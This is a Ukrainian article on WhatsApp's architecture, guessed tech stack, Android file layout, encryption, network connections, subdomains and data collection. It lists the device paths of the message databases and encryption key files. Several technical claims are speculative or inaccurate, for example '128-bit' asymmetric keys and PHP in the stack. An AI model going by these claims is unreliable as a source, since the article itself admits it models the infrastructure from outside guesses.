Архітектура WhatsApp є клієнт-серверною (client-server). Тобто є клієнт і сервер, які обмінюються даними між собою у зашифрованому вигляді. Клієнт – це додаток. Сервер – це комп’ютер, який обслуговується UNIX-подібною операційною системою та з’єднується з базами даних, мережевими службами й інтерфейсами, а також іншими серверами, з яких отримує інформацію й пересилає по транспортному TCP-протоколу до клієнта. Аналогічно він отримує від нього дані. На архітектурі client-server побудовані майже усі онлайн-додатки та інтернет-сервіси, такі як Viber, Skype, iMessage, Telegram та інші.

Архітектура WhatsApp
Орієнтована архітектура месенджера WhatsApp по моделі клієнт-сервер

Технологічний стек

Розглянемо технологічний стек WhatsApp, який умовно можна розділити на BackEnd (програмно-апаратні технології) і FrontEnd (технології інтерфейсу).

Примітка: Хочемо зазначити, що ми не знаємо точних технічних характеристик інфраструктури WhatsApp і спробуємо змоделювати її на основі відкритих джерел. Аргументація, використана для проведення цього аналізу, відноситься до зовнішнього типу «чорної скриньки», тобто без безпосереднього допуску до внутрішньої інфраструктури платформи.

BackEnd WhatsApp:

  • Erlang – це мова функційного програмування з динамічною типізацією, призначена для розробки програм для різного роду розподілених і багатониткових систем. Розроблена і підтримується компанією Ericsson. Erlang підтримує паралелізм, відмовостійкість і зв’язок у реальному часі, що робить його чудовим вибором для створення програм обміну повідомленнями.
  • FreeBSD – UNIX-подібна операційна система з відкритим вихідним кодом, яка використовується для управління мережевими службами та серверами.
  • YAWS (Yet Another Web Server) — це веб-сервер із відкритим кодом, який програма використовує для обробки запитів HTTP. YAWS відомий своєю масштабованістю та продуктивністю та є популярним вибором для створення веб-додатків із високим трафіком.
  • GraphQL – це мова запитів до сервера, яка дозволяє клієнтам вибирати, які саме дані вони хочуть отримати. Вона дозволяє визначати свої власні типи та поля, а потім використовувати їх у своїх запитах. GraphQL дозволяє зменшити кількість запитів до сервера та отримати тільки ті дані, які потрібні для виконання завдання, що робить його більш ефективним у порівнянні з REST API.
  • Mnesia DB – це багатокористувацька розподілена система управління базами даних (СУБД) на базі Erlang. Mnesia допомагає отримати швидші відповіді на запити, тим самим покращуючи загальну ефективність.
  • BEAM (Bogdan’s Erlang Abstract Machine) — це віртуальна машина, яка компілює та виконує вихідний код Erlang. BEAM розроблено спеціально для висококонкурентних додатків, таких як WhatsApp.
  • Cassandra — це розподілена база даних NoSQL, яку використовує WhatsApp для зберігання даних і повідомлень користувачів. Cassandra забезпечує високу масштабованість і продуктивність і розроблена для обробки великих обсягів даних на кількох вузлах.
  • Kafka — це розподілена потокова платформа, яка використовується для обробки потоків даних у реальному часі. Kafka забезпечує високу масштабованість і відмовостійкість, а також славиться створенням додатків у реальному часі.
  • OpenSSL – це відкрите програмне забезпечення для реалізації протоколів безпеки для передачі даних, таких як SSL (Secure Sockets Layer) і TLS (Transport Layer Security).
  • Zlib – це відкрита бібліотека стиснення даних, яка надає ефективні алгоритми стиснення для зменшення обсягу даних. Розроблена та підтримується деякими незалежними розробниками.
  • Ejabberd — це сервер, що працює по протоколу XMPP (Extensible Messaging and Presence Protocol) з відкритим вихідним кодом. WhatsApp використовує його для обробки миттєвих повідомлень і інформації про присутність користувача. Ejabberd відомий своєю швидкістью, масштабованістю та надійністю й є популярним вибором для створення програм обміну повідомленнями.
  • Amazon S3 – це хмарна служба для зберігання даних. Гарантує високий рівень доступності та надійності для забезпечення постійного доступу до даних. Використовується розробниками для забезпечення ефективного та безпечного зберігання об’ємних об’єктів даних в хмарному середовищі.

Окрім цього, застосовуються системи доставки контенту (CDN), система інтеграції (API), алгоритми машинного навчання (ML), технології штучного інтелекту (AI) та обробка природної мови (NLP).

FrontEnd WhatsApp:

  • HTML5 (Hypertext Markup Language) – гіпертекстова мова тегів для розмітки веб-сторінок.
  • CSS (Cascading Style Sheets) – каскадні таблиці стилів для оформлення веб-сторінок та додатків з графічних інтерфейсом.
  • PHP (Hypertext Preprocessor) – це скриптова мова програмування, яка використовується для розробки динамічних веб-застосунків.
  • JavaScript – це високорівнева, об’єктно-орієнтована мова програмування, яка використовується для створення динамічного контенту на веб-сторінках.
  • Redux — це бібліотека керування станом програми. Redux дозволяє розробникам створювати централізоване сховище даних, доступ до якого можна отримати з будь-якої точки програми, що полегшує керування даними та відстеження змін.
  • React Native – це фреймворк для побудови мобільних додатків, розроблений компанією Facebook.
  • Relay – це фреймворк для React, розроблений компанією Facebook. Він використовується для створення масштабованих веб-додатків з великою кількістю інтерфейсів. Relay дозволяє вбудовувати запити до сервера безпосередньо в компоненти React, що робить код більш зрозумілим і легким для управління.
  • Redux – це додаткова бібліотека для React, яка використовується для керування станом додатків. Вона дозволяє зберігати стан додатку в одному місці, що робить його керування більш простим. В основі Redux лежить принцип однонаправленого потоку даних, коли будь-яка зміна в стані відбувається через дії (actions), які викликаються з компонентів.
  • Java – це високорівнева, об’єктно-орієнтована мова програмування, яка використовується для розробки мобільних додатків. Однією з особливостей Java є те, що вона є мовою програмування, що працює на будь-якій мові, оскільки вона компілюється в байт-код, який виконується на віртуальній машині Java (JVM).
  • Swift – це мова високого рівня, створена Apple для розробки мобільних додатків на iOS.
  • Kotlin – це статично типізована мова програмування, що працює на віртуальній машині Java (JVM) і може бути використана для розробки мобільних додатків на Android.
  • SQLite – це автономна реляційна база даних, яка призначена для вбудовування в програми, що означає, що вона локально зберігається на пристрої користувача. WhatsApp використовує його для зберігання розмов, щоб не витрачати ресурси для постійного з’єднання з хмарними серверами баз даних.
  • HTTP WebSockets – використовується для надсилання та отримання мультимедійних даних, таких як зображення та відео.
  • WebRTC (Web Real-Time Communication) – це технологія, яка дозволяє реалізувати відео- та голосові дзвінки, обмін файлами та текстові чати у режимі реального часу (RTC), без необхідності встановлення додаткового програмного забезпечення або плагінів.

Джерела:

Принцип використання WhatsApp

👤Принцип використання WhatsApp побудований на взаємодії користувача з мобільним додатком WhatsApp Messenger, який виступає основним клієнтом для зв’язку з серверною інфраструктурою WhatsApp.

Для початку роботи, користувач має самостійно завантажити на свій мобільний пристрій додаток WhatsApp Messenger з інтернету: офіційного сайту (пряме посилання на Android APK) або репозиторіїв Google Play Store і Apple App Store. Підтримуються операційні системи: Android (5.0+), iOS (12+) та KaiOS 2.5.0 (детальніше).

Як завантажити WhatsApp месенджер

Далі користувачу необхідно пройти реєстрацію по номеру телефона – підтвердивши його по SMS або через дзвінок. Після цього користувач отримує персональний обліковий запис в системі WhatsApp, також паралельно створюються ключі шифрування (див. нижче).

Реєстрація у месенджері WhatsApp
Приклад створення нового облікового запису в WhatsApp

Обліковий запис можна додатково захистити паролем, що реалізує двофакторну аутентифікацію.

З квітня 2016 року WhatsApp використовує наскрізне шифрування (E2EE) для всіх комунікацій, включаючи чати, медіафайли, голосові та відеодзвінки.

WhatsApp Messenger виступає основним додатком і має декілька додаткових версій:

  1. WhatsApp Desktopверсія месенджера WhatsApp для ПК, яка є залежною від мобільного додатку і потребує сканування QR-коду для входу. При вимкненні мобільного пристрою, десктопна версія продовжує працювати. Серед підтримуваних операційних систем WhatsApp Desktop – Windows та MacOS (11.0+). Зверніть увагу, що ОС Linux у списку підтримуваних WhatsApp Desktop немає. Однак є неофіційні версії, наприклад WALC, Whatsie, Whatdesk, Ferdium, Zapzap. Як повідомляється у блозі Engineering Meta, в майбутньому планується зробити WhatsApp Desktop автономною і незалежною від мобільного додатка, на кшталт Telegram Desktop.
  2. WhatsApp Web – браузерна версія WhatsApp, яка працює по HTTP-протоколу, доступ до неї можна отримати з будь-якого пристрою, на якому є веб-переглядач, набравши URL-адресу: https://web.whatsapp.com/. WhatsApp Web також прив’язується до мобільного пристрою і вхід здійснюється по QR-коду.
  3. WhatsApp Business – це окрема версія популярного месенджера WhatsApp, спеціально розроблена для малого бізнесу. Вона надає додаткові функції, які дозволяють компаніям більш ефективно спілкуватися зі своїми клієнтами та організовувати бізнес-процеси. Детальніше: https://business.whatsapp.com

Файлова структура

📂Файлова структура WhatsApp для Android має наступну ієрархію:

  • ~/Android/media/com.whatsapp/WhatsApp – шлях, де месенджер зберігає резервні копії та медіафайли. Містить підпапки:
    • Backups – містить зашифровані резервні копії чатів, контактів, налаштувань, стікерів. Наприклад, ви можете знайти зашифровані файли бази даних контактів wa.db.crypt;
    • Databases – містить усі ручні та автоматичні резервні копії бази даних у такому форматі: msgstore-YYYY-MM-DD.db.crypt15;
    • Media – містить усі надіслані й отримані медіафайли, регулярно створюйте резервну копію цієї папки, якщо вона має для вас цінність. Складається з підпапок:
      • WallPaper – шпалери для чатів;
      • WhatsApp Audio – містить аудіофайли, отримані/особисті (Private) та відправлені (Sent);
      • WhatsApp Images – містить графічні файли – “Private” (приватні) й “Sent” (надіслані);
      • WhatsApp Stickers – стікери;
      • WhatsApp Video Notes – дані відеонотаток;
      • WhatsApp Animation – анімовані файли;
      • WhatsApp Documents – для зберігання документів;
      • WhatsApp Profile Photos – містить фотографії профіля;
      • WhatsApp Video – для зберігання відеофайлів;
      • WhatsApp Voice Notes – містить голосові повідомлення у форматі .opus.
      • .shared – розшарені дані;
      • .trash – видалені файли;
      • .thumbs – мініатюри зображень;
      • .SticketThumbs – мініатюри стікерів.
  • ~/Android/data/com.whatsapp/cache – тут можуть зберігатись деякі тимчасові кешовані дані;
  • /data/data/com.whatsapp – основна директорія WhatsApp (може бути доступною лише за наявності root-прав), містить підпапки:
    • app_account_switching – дані перемикання між акаунтами;
    • app_minidumps – мінідампи додатку;
    • app_textures – текстури додатку;
    • app_webview – дані веб-перегляду;
    • cache – кешовані дані;
    • code_cache – кеш коду;
    • databases – бази даних, без шифрування. Наприклад: wa.db – локальна база даних контактів користувача WhatsApp в форматі SQLite, msgstore.db – база даних повідомлень користувача, axolotl.db – містить криптографічні ключі та інші дані, необхідні для ідентифікації власника облікового запису;
    • files – увага, у цій папці знаходяться основні файли WhatsApp: ключі шифрування (key, encrypted_backup.key), статистика, логи;
    • lib-main – бібліотеки;
    • no_backup – файли які не підлягають автоматичному резервному копіюванню;
    • shared_prefs – містить файли налаштувань облікового запису WhatsApp в форматі XML. Наприклад: com.whatsapp_preferences.xml, registration.RegisterPhone.xml.
  • /sdcard/WhatsApp/ – щоб заощадити місце в пам’яті пристрою Android, деякі дані WhatsApp можуть зберігатися на SD-карті. Директорія містить наступні теки:
    • .Shared
    • .trash
    • Databases
    • Media
    • Profile pictures

Як бачимо, на відміну від Telegram, де локальні дані фактично не шифруються і достатньо просто склонувати потрібну службову папку, щоби отримати доступ до сесії, WhatsApp шифрує базу даних і без ключа та спеціалізованого софту її дуже складно дешифрувати. Якщо смартфон нерутований, то дані отримати ще складніше.

Примітка: Неважаючи на вищесказане, варто взяти до уваги той факт, що такі продукти цифрової криміналістики як Cellebrite UFED, Cellebrite Physical Analyzer та Oxygen Forensic Detective, які застосовуються правоохоронними органами по всьому світу, запевняють, що здатні відновити ключі шифрування і розшифрувати будь-які дані. Отже, якщо є ризик фізичного доступу до пристрою – наскрізне шифрування WhatsApp не врятує. Це, до речі, стосується і інших месенджерів, побудованих на тій самій архітектурі, наприклад Signal.

WhatsApp folders

Бази даних WhatsApp
Бази даних wa.db і msgstore.db — основні файли, які містять артефакти WhatsApp на Android

Шифрування WhatsApp

🔒Шифрування WhatsApp базується на криптографічному протоколі Signal Protocol, розробленим у 2013 році в Open Whisper Systems (Signal Foundation) Моксі Марлінспайком.

В ньому використовується 128-бітне асиметричне шифрування за алгоритмом Діффі-Хеллмана (ECDH) з підтримкою технологій: Axolotl (Double Ratchet Algorithm), Curve25519, AES256, SHA256.

Асиметричне шифрування в месенджері WhatsApp працює наступним чином:

  1. Генерується пара 128-бітних криптографічних ключів – відкритий (public) і закритий (private).
  2. Відкритий ключ розповсюджується і може зберігатись на серверах WhatsApp, а закритий – зберігається на локальному пристрої користувача і недоступний постачальнику.
  3. У висновку лише користувач має доступ до закритого ключа й може з його допомогою розшифрувати та читати повідомлення. Власне, це і гарантує конфіденційність чатів.

Таким чином, усі сеанси і чати в WhatsApp захищені наскрізним End-to-End шифруванням (E2EE, 1:1).

Шифрування повідомлень в WhatsApp

Кожен чат у WhatsApp має свій власний код безпеки. Це – унікальний хеш, який можна знайти на екрані інформації про контакт у вигляді QR-коду або 60-значного номера. Співрозмовники можуть звірити цей код між собою і переконатися, що їх листування автентичне. У випадку, якщо ваш співрозмовник змінить пристрій або його акаунт буде зламано/змінено – ви отримаєте сповіщення про зміну коду безпеки. Ця функція може захистити від атак типу Man-in-the-Middle (“Людина по середині”) і працює на базі бібліотеки AKD.

WhatsApp Verify Security

У своєму наскрізному шифруванні WhatsApp також підтримує технологію Perfect Forward Secrecy (PFS) – це просунута функція безпеки, яка гарантує, що у випадку компрометації одного з ключів шифрування, зловмисник не зможе розшифрувати попередню історію або майбутні повідомлення (крім поточних), тому що ключі шифрування для кожного сеансу щоразу оновлюються.

👉 Детальніше про процес шифрування WhatsApp читайте у технічних документах “WhatsApp Encryption Overview” та “WhatsApp Key Transparency Overview”.

Мережеві з’єднання WhatsApp

Я спробував проаналізувати мережеву поведінку WhatsApp Messenger на мобільному пристрої під управлінням Android. Для цього скористався звичайним файєрволом No Root Firewall (можна також скористатись – NetCapture).

У висновку, були зафіксовані TCP-з’єднання з хостами на незахищеному 80 та нестандартному 5022 портах. Незахищений 80-й порт використовувався WhatsApp для з’єднання з серверами Amazon, а 5022-й – з Jabber-сервером, який використовується WhatsApp для миттєвого обміну повідомленнями по протоколу XMPP.

З точки зору кібербепзеки, використання незахищеного з’єднання TCP 80 є сумнівним, адже створює ризик перехоплення даних з допомогою атак Man-in-the-Middle (“Людина посередині”, MITM). В офіційній документації він взагалі не згадується, натомість йде мова тільки про захищений 443-й порт на HTTPS-протоколі та 5222 Jabber.

Деякі з IP-адрес хостів, з якими з’єднується WhatsApp, мають шкідливі індикатори в OTX AlienVault та VirusTotal. Подібні з’єднання можна відфільтрувати брандмауером і додатково зашифруватись VPN-тунелем. Але звичайний користувач не буде цього робити. Таким чином, існує ймовірність, що потенційна зловмисна програма (троян або бекдор) чи зловмисник зможуть використати вразливі місця.

WhatsApp Virustotal analysis

Далі я вирішив скласти мережу мапу WhatsApp й почав збирати та аналізувати субдомени, скориставшись інструментом OWASP Amass:

Subdomain Enumeration

Список доменів і субдоменів WhatsApp:

  • fbcdn.net — CDN-мережа Facebook, через яку проходить трафік WhatsApp.
  • facebookmail.com — використовується для відправки різноманітних повідомлень електронної пошти користувачамна продуктів Meta, на нього вказує SPF-запис в DNS-зоні домену whatsapp.com: v=spf1 include:_spf.fb.com include:_spf.google.com include:facebookmail.com -all.
  • whatsapp.com — основний домен, на якому розміщений офіційний веб-сайт WhatsApp.
  • whatsapp.net — технічний домен, на якому базуються інші субдомени та різні мікросервіси.
  • whatsapp.biz — технічний домен, який використовується WhatsApp Business.
  • web.whatsapp.com — веб-версія WhatsApp, що дозволяє користувачам отримувати доступ до свого облікового запису WhatsApp через інтернет-браузер.
  • api.whatsapp.com — цей субдомен використовується для доступу до API, що дозволяє стороннім програмам взаємодіяти зі службами WhatsApp для різних функцій.
  • business.whatsapp.com — субдомен призначений для WhatsApp Business, надає ресурси та інструменти для спілкування зі своїми клієнтами за допомогою WhatsApp.
  • blog.whatsapp.com — на цьому субдомені розташований офіційний блог WhatsApp.
  • faq.whatsapp.com — цей субдомен містить розділ поширених запитань (FAQ), який надає підтримку користувачам WhatsApp.
  • chat.whatsapp.com — використовується для запрошень і посилань на груповий чат WhatsApp, що дозволяє користувачам приєднуватися до групових чатів через URL-адресу.
  • call.whatsapp.com — субдомен використовується для функції голосового та відео дзвінків у месенджері WhatsApp, зокрема для запрошень та посилань на дзвінки.
  • cdn.whatsapp.net — використовується для доставки інформації через мережу доставки контенту (CDN, Content Delivery Network). Основне призначення цього субдомену полягає у швидкій і ефективній передачі статичних ресурсів, таких як зображення, відео, аудіофайли, файли JavaScript і CSS, які використовуються в додатку WhatsApp.
  • static.whatsaspp.net — використовується для зберігання статичних ресурсів, таких як зображення, шрифти, стилі CSS та інші файлові ресурси, які використовуються у веб-версії WhatsApp, веб-інтерфейсі та інших веб-додатках, пов’язаних з месенджером.
  • crashlogs.whatsapp.net — використовується WhatsApp для збору та аналізу журналів аварій (crash logs), які можуть стосуватися аварій, помилок та винятків, які виникають у мобільних додатках під час використання месенджера.
  • graph.whatsapp.com — використовується для взаємодії з API, яке надає функції і сервіси, пов’язані з обробкою даних і інтеграцією з іншими сервісами
  • v.whatsapp.net — використовуєтья для авторизації, верифікації, реєстрації облікового запису користувача (наприклад, https://v.whatsapp.net/v2/register).
  • scontent.whatsapp.net — використовується для зберігання і доставки різноманітного контенту. Щось на зразок CDN (Content Delivery Network).
  • account.whatsapp.com — використовується для управління обліковими записами користувачів та виконання різних дій, пов’язаних з налаштуваннями облікового запису в WhatsApp.
  • autodiscover.whatsapp.com – ймовірно використовується для автоматичного налаштування та конфігурації облікових записів користувачів. Також він задіяний для інтеграції з сервісами Microsoft Office 365, про що вказують DNS-записи: autodiscover.outlook.com та atod-g2.tm-4.office.com.
  • fna.whatsapp.net — використовується для обробки та доставки мультимедійного контенту через мережу доставки контенту (CDN).
  • g.whatsapp.net – цей субдомен може використовуватися для обробки і синхронізації текстових повідомлень між користувачами, забезпечуючи їх швидку доставку та актуальність.
  • mmg.whatsapp.net — використовується для надсилання мультимедійних файлів.
  • mmg-fna.whatsapp.net — аналогічно використовується для насдсилання мультимедійних даних.
  • v.snr.whatsapp.net
  • c.whatsapp.net
  • g-fallback.whatsapp.net — використовується WhatsApp для забезпечення резервного (fallback) механізму доставки повідомлень, медіа-файлів та іншого контенту, коли основні сервери недоступні або мають проблеми зі з’єднанням.
  • dit.whatsapp.net — зазвичай використовується WhatsApp для доставки інформації про стан повідомлень (Delivery Information Tool), яка дозволяє відстежувати, коли повідомлення було успішно доставлене до адресата.
  • a.ns.whatsapp.net — неймсервер WhatsApp.
  • b.ns.whatsapp.net — неймсервер WhatsApp.
  • c.ns.whatsapp.net — неймсервер WhatsApp.
  • d.ns.whatsapp.net — неймсервер WhatsApp.
  • pps.whatsapp.net — використовується WhatsApp для обробки та доставки профільних фотографій (profile pictures) користувачів.
  • wa.me — домен WhatsApp, який служить для використання різних API-функцій, а також для формування коротких посилань на швидке створення діалогів, додавання номеру телефону.
  • ftl.whatsapp.com — служить для перенаправлення користувачів або інтеграції функцій, пов’язаних із Forward to Lead (FTL) у системі WhatsApp Business.
  • my-od.whatsapp.com — ймовірно призначений для специфічних внутрішніх або адміністративних функцій WhatsApp.
  • lerequest.whatsapp.com — використовується для обробки запитів, пов’язаних із WhatsApp Business API.
  • payments-localisation.whatsapp.com — використовується для контролю за дотриманням правил локалізації даних, пов’язаних із платіжними послугами. Ймовірно, це частина зусиль WhatsApp щодо дотримання вказівок Резервного банку Індії (RBI) про локалізацію даних, гарантуючи, що всі дані транзакцій, пов’язані з WhatsApp Pay, зберігаються всередині країни для підвищення безпеки та конфіденційності даних.
  • dev-web.whatsapp.com — ймовірно використовується для розробки та тестування деяких функцій WhatsApp Web.
  • test-web.whatsapp.com — тестовий домен WhatsApp.
  • tizen.whatsapp.net — призначений для інтеграції та підтримки WhatsApp на пристроях, що працюють на операційній системі Tizen.
  • privatestats.whatsapp.net — ймовірно використовується для збору статистичних даних про те, як користувачі взаємодіють із WhatsApp.
  • bin-short.whatsapp.net — використовується в контексті реалізації певних функцій або сервісів, що стосуються з’єднання з серверами WhatsApp, зокрема XMPP.
  • fastdesk.whatsapp.net — може використовуватися для швидкодії в роботі з десктопною версією WhatsApp або для послуг, що прискорюють робочі процеси в межах платформи Facebook. На це також вказує домен whatsapp-fastdesk-regional.vvv.facebook.com.

По даним Subdomain Finder, інфраструктура WhatsApp налічує близько 8669 доменів. Деякі домени були оприлюднені в проєкті The Block List Project.

Також я вирішив перевірити логи WhatsApp, які зберігаються на пристрої в файлі: /data/data/com.whatsapp/files/logs/whatsapp.log. Виявилося, що додаток постійно звертається до сервісів Facebook, а саме:

  • com.facebook.katana – компонент мобільного додатку Facebook;
  • com.facebook.services.identity.feo2.api – компонент ідентифікації Facebook для підтвердження особистості користувача.

Системні логи WhatsApp

Ще раз переконуємося в тому, що WhatsApp є частиною екосистеми Facebook. І нікуди від цього не дітися. За наявності встановленого додатка Facebook, месенджер буде повсякчас обмінюватися з ним даними і взаємодіятиме для різних функцій. Зокрема, він може використовувати сервіси Facebook для синхронізації контактів, резервного копіювання даних, інтеграції з рекламними платформами та багато іншого.

Користувачів, які цінують конфіденційність, подібна спорідненість з Facebook може непокоїти. І не дивно. Адже враховуючи відносно недавній публічний витік інформації користувачів Facebook в Cambridge Analytica (див. нижче), то існують великі побоювання чи навчився Meta (Facebook) захищати дані користувачів на відповідному рівні і як він ними розпоряджається.

Таблиця порівняння. Які дані про вас збирають різні месенджери: Signal, iMessage, WhatsApp та Facebook Messenger.

Які дані збирає WhatsApp?

Перейдемо до того як WhatsApp обробляє величезні масиви даних, які він отримує через свій додаток від мільйонів користувачів по всьому світу.

Усі дані WhatsApp у зашифрованому та захешованому (знеособленому) вигляді зберігає локально (на пристрої користувача) та віддалено (на хмарних серверах).

Кожен користувач має змогу здійснити експорт облікового запису та переконатись які його дані зберігає месенджер.

Для цього необхідно в налаштуваннях “Settings” обрати розділ “Account” та перейти в “Request account info”, де можна оформити 2 типи звіту – “Request account report” (Звіт про акаунт) та “Request Channels report” (Звіт по каналам):

Request account report

Звіт буде доступний приблизно через 24 години у вигляді ZIP-архіву з файлами HTML та JSON, які можна відкрити та переглянути на ПК у браузері. Звіт розбитий на 3 розділи: “WhatsApp account information”, “WhatsApp connections”, “WhatsApp settings”. Кожен з них містить детальну інформацію про користувача:

WhatsApp account information

WhatsApp user info

Whatsapp account settings

Проаналізувавши даний звіт, а також: локальні бази даних, файли конфігурацій, Умови використання, Політику конфіденційності, Політика щодо інтелектуальної власності, Правила сервісу WhatsApp, Правила пов’язаних продуктів Meta, дані з відкритих джерел, ми сформували повний перелік метрик, які накопичує WhatsApp:

  • Profile ID — персональний ідентифікатор користувача, чату, групи, спільноти;
  • Timestmap — часові відмітки (дата і час), наприклад час відправлення повідомлень у чаті;
  • Creation time — дата створення будь-чого: акаунту, чатів, груп;
  • Member count — кількість учасників чатів, груп і т.д.;
  • Parent group ID — список прив’язаних груп до спільноти (Community);
  • Creator ID — ідентифікатор засновника або засновників чату, групи і т.д.;
  • Locale — інформація про локалізацію додатка (мова інтерфейсу), код (напр., en_US);
  • Time Zone — інформація про часову зону;
  • Contacts — інформація про контакти користувача (адресна книга), їх кількість, ідентифікатори, номери телефонів (хешуються), заблоковані контакти (Blocked contacts), список контактів з якими ви найчастіше спілкуєтеся;
  • Status — інформація у полі статуса користувача, включаючи timestamp;
  • Photo ID — фото профілів користувачів, груп, контактів, включно із мініатюрами та датами завантаження/оновлення/видалення;
  • Description — будь-яка інформація в описі акаунтів, груп, чатів, каналів;
  • Profile name — будь-які імена в системі: акаунтів, чатів, пабліків, груп, спільнот, включно з хронологією зміни;
  • Messages — історія листування користувачів, включно із timestamp’ами, загальна кількість відправлених/отриманих, прочитаних/непрочитаних,  а також їх тип – обрані/відзначені, перенадіслані, офлайн повідомлення. У своїй політиці WhatsApp наголошує, що історія повідомлень зберігається на пристроях користувачів, а самі повідомлення після доставки вилучаються з їх серверів, однак за деяких умов повідомлення можуть зберігатися на серверах 30 днів і надаватися за рішенням суду правоохоронним органам;
  • Emoji/Gifs — інформація про емодзі, які ви найчастіше використовували, історія пошуку гіфок;
  • Spam list — інформація про контакти або об’єкти (повідомлення, чати, групи), які були відзвітовані вами як спам/скам;
  • Phone number — номер телефону облікового запису, код країни;
  • Phone network — інформація про мобільного оператора і стільниковий зв’язок (LTE), рівень сигналу в мережі, emergency, наявні налаштування та режими;
  • Chat ID — інформація про чати – приватні/публічні/приховані, ідентифікатори, кількість учасників та відправлених повідомлень, адміністратори, репутація, timestamp, налаштування чатів та інша статистика;
  • Media — фото та відео, файлові документи, їх технічні дані: вага, габарити, формат, хеш, шлях розташування, метадані;
  • Call ID — інформація про вхідні/вихідні дзвінки в WhatsApp – особисті, групові, пропущені, аудіо/відео, включаючи timestamps, duration, destination, кількість дзвінків, передані байти, посилання та інші дані;
  • Device ID — інформація про мобільний пристрій, модель і виробника смартфону, код IMEI та інші ідентифікатори;
  • Operating System — інформація про операційну систему, версію, збірку, наявність або відсутність root-прав;
  • IP Address — інформація про усі IP-адреси, з яких користувач: реєструвався, підключався, здійснював останній вхід;
  • Internet Network — інформація про інтернет-мережу, провайдера (ISP), DNS-сервери, передачу даних, типи з’єднання – Mobile data/Wi-Fi/Ethernet/VPN;
  • Web Browser — інформація про веб-переглядач;
  • Financial info — інформація про платежі, здійснені через додаток WhatsApp: інвойси, timestamp, id транзакції, сума, валюта, назва банка, ініціатор, отримувач та інші дані (Payment Info, Purchase Data, Purchase History);
  • App ID — інформація про версію додатка WhatsApp;
  • App settings — налаштування додатку, включаючи двофакторну авторизацію та інші опції;
  • Device settings — налаштування мобільного пристрою, включаючи інформацію про дозволи додатку WhatsApp;
  • GPS-координати — геолокація пристрою користувача (latitude, longitude, accuracy), за умови увімкненої функції “Поділитись локацією”;
  • Backup settings — інформація про резервне копіювання;
  • Logs and Troubleshooting Info — технічні журнали додатка та пристрою, зареєстровані події, діагностичні дані (Diagnostic Data), баги і падіння (Crash Data), продуктивність (Performance Data);
  • Stats — статистика використання, досвід взаємодії з додатком (Product Interaction);
  • Email Address — електронна адреса користувача, за умови, якщо ви вказали її як додатковий спосіб резервного відновлення свого акаунта;
  • Products Meta ID — інформація про продукти Meta, які ви застосовуєте, список їх ідентифікаторів;
  • Cookies — користувацькі кукі, використовуються для відслідковування поведінкових факторів та персоналізації (детальніше);
  • Third-Party Info — інформація про користувача з третіх сторін. Наприклад, з облікових записів інших користувачів WhatsApp;
  • Google Play / App Store info — інформація від магазину додатків, наприклад звіти, які допомагають діагностувати та виправляти проблеми з обслуговуванням.

WhatsApp Data Collect

Як та навіщо WhatsApp використовує ваші дані?

  • Оптимізація, покращення, вдосконалення сервісів. Аналіз користувацького досвіду, відстеження показників ефективності і телеметрія, створення, дослідження і тестування нових функцій/інтеграцій, моніторинг і оптимізація продуктивності, усунення багів, проблем та помилок, покращення юзабіліті та інфраструктури.
  • Обмін інформацією з продуктами, компаніями Meta. Маркетингові дослідження, персоналізація, продаж послуг. Як сказано в офіційній довідці (F.A.Q.), WhatsApp обмінюється деякими даними з продуктами Meta (Facebook, Instagram, Threads та ін.). Це може здійснюватись з метою реклами (націлювання на аудиторію і показ оголошень), продажу та розповсюдження власних послуг і т.п. В логах WhatsApp можна помітити регулярні запити до com.facebook.services.identity.feo2.api та com.facebook.katana. Власне, на таких торгово-економічних відносинах й грунтується безкоштовність WhatsApp. Пам’ятайте, що тільки в обмін на дані, ви отримуєте можливість безкоштовно спілкуватися та взаємодіяти один з одним з допомогою їх сервісів. Безкоштовний сир є лише у мишоловці.
  • Юридичні зобов’язання, сприяння безпеці. Як вже згадувалося, продукти Meta підключені до розвідувальної системи PRISM і регулярно співпрацюють з урядами, правоохронними органами, різними установами та організаціями. На їх вимогу та за рішенням суду, WhatsApp може розкрити будь-яку доступну йому інформацію про користувача. Існує навіть спеціальна система для невідкладних запитів правоохоронних органів. Дані користувача можуть зберігатися на серверах WhatsApp до 90 днів. В основному, подібна процедура застосовується в рамках боротьби з тероризмом, дезінформацією, сприяння безпеці та цілісності продуктів WhatsApp.
  • Технічна підтримка. Як і будь-яка централізована структура, WhatsApp налічує тисячі адміністраторів, які модерують контент та надають користувачам технічну підтримку, що включає передачу різноманітної інформації про користувача та його пристрій. В офіційній довідці зазначається, що існує кілька видів інформації, яку WhatsApp ніколи не запитує. Це конфіденційні персональні дані, ваше повне ім’я, PIN-код і платіжна інформація.

WhatsApp ділиться інформацією з Meta

В WhatApp існує спеціальна система для невідкладного розгляду запитів. Якщо ви є представником правоохоронних органів і маєте повноваження збирати докази у зв’язку з офіційним розслідуванням – WhatsApp розкриє інформацію з будь-якого облікового запису.

Важливі зауваженя щодо політики конфіденційності та обробки користувацьких даних в WhatsApp

  • Користувачі з різних країн отримують послуги WhatsApp від двох різних компаній: WhatsApp Ireland Limited та WhatsApp LLC (дивись список країн обслуговування). Відповідно Політика конфіденційності WhatsApp для користувачів з різних країн теж може відрізнятися.
  • Дані користувача може передаватися, зберігатися та додатково оброблятися в країнах, де розташовані філії та партнери Meta. Країни або території, куди передається користувацька інформація, можуть також мати власні положення про конфіденційність і засоби захисту.
  • WhatsApp використовує глобальну інфраструктуру та центри обробки даних в США, які підпорядковується місцевому законодавству. Якщо між вами виникне претензія чи суперечка, пов’язана з використанням WhatsApp, то ви погоджуєтеся, що вона буде вирішуватися в Північному окружному суді США. Округ Каліфорнії або суд штату в окрузі Сан-Матео. Ви також погоджуєтеся підкорятися особистій юрисдикції будь-якого з цих судів з метою судового розгляду будь-якої претензії, і що закони штату Каліфорнія регулюватимуться цими Умовами та будь-якою такою претензією чи суперечкою без урахування положень колізійного права.
  • WhatsApp може на власний розсуд подати будь-який позов на будь-якого користувача, до будь-якого компетентного суду країни, у якій він проживає, якщо у них будуть вагомі підстави на це.
  • WhatsApp знімає з себе зобов’язання та відповідальність за використання його продуктів: “Ми надаємо наші послуги на умовах «як є» без будь-яких явних або непрямих гарантій… Ми не гарантуємо, що будь-яка надана нами інформація є точною, повною чи корисною, що наші сервіси будуть функціональними, безпомилковими, захищеними чи безпечними, або що наші сервіси працюватимуть без збоїв, затримок або недосконалостей. Ми не несемо відповідальності та не зобов’язані контролювати дії чи інформацію (включаючи вміст) наших користувачів або інших третіх сторін. Ви звільняєте нас, наші дочірні компанії, філії та наших та їхніх директорів, посадових осіб, співробітників, партнерів і агентів від будь-яких претензій, скарг, підстав для позову, суперечок або збитків, відомих та невідомих…”.

